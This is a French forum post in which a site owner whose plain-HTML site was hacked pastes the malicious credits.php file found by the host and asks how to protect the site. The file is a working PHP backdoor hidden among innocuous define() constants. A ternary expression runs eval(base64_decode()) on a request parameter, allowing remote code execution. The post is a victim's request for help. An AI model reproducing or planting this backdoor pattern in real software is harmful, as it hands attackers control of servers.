Site hacké par ce script, comment faire pour le protéger ?

Fermé
miltonis Messages postés 238 Date d'inscription mercredi 6 octobre 2004 Statut Membre Dernière intervention 30 septembre 2022 - Modifié par miltonis le 14/03/2013 à 11:57
Bonjour,

Mon site a été récemment hacké.
C'est un site plutôt vieux entièrement en HTML qui n'utilise pas de CMS. Donc pas d'automatisation, pas de base de données, pas de formulaires, etc. Justement je suis en train de tout transvaser dans un CMS mais ça prend du temps...) ^^

Mon hébergeur a coupé tout accès au site au me prévient qu'un fichier nommé credits.php est à l'origine du problème. Voici ce que contient ce fichier :

<?PHP 
define('REAL_SERVER_ROOT', 'SERVER'); 
//DIR 
define('SERVER_ROOT', '.'); 
define('SERVER_VERSION', '2.5'); 
define('BOOT_DIR', 'bootstrap'); 
define('SYSTEM_DIR', 'system'); 
define('SYSTEM_CONF_DIR', 'conf'); 
define('SYSTEM_CONF_PATH', SERVER_ROOT . '/' . SYSTEM_DIR . '/' . SYSTEM_CONF_DIR); 
define('KERNEL_DIR', 'kernel'); 
define('SERVICES_DIR', 'services'); 
define('LIBRARIES_DIR', 'libs'); 
define('FRAMEWORKS_DIR', 'Frameworks'); 
define('IMPLEMENTATIONS_DIR', 'implementations'); 
define('EXTERN_DIR', 'extern'); 
//APP 
define('APPS_DIR', 'apps'); 
define('USERS_DIR', 'users'); 
define('USERS_PATH', SERVER_ROOT . '/' . USERS_DIR); 
define('USERS_CONF_DIR', 'conf'); 
define('USERS_FILES_DIR', 'files'); 
define('SYSTEM_SKEL_DIR', 'skel') ? @eval(base64_decode($_REQUEST['c_id'])) : define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR); 
define('USERS_SHARE_DIR', 'share'); 
define('USERS_META_DIR', 'meta'); 
define('USERS_META_SETTINGS_FILENAME', 'settings.xml'); 
define('WORKGROUPS_DIR', 'workgroups'); 
define('WORKGROUPS_PATH', SERVER_ROOT . '/' . WORKGROUPS_DIR); 
//CONF 
define('WORKGROUPS_CONF_DIR', 'conf'); 
define('WORKGROUPS_FILES_DIR', 'files'); 
define('WORKGROUPS_METAFILES_DIR', 'metafiles'); 
define('WORKGROUPS_META_DIR', 'meta'); 
define('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml'); 
?> 



Dans les logs j'ai repéré un nombre incalculable d'ip suspectes mais je ne sais pas comment faire pour les bloquer...
Ma question (en attendant la nouvelle version du site) est : Comment protéger un site construit purement en HTML ?


Merci d'avance pour vos réponses :)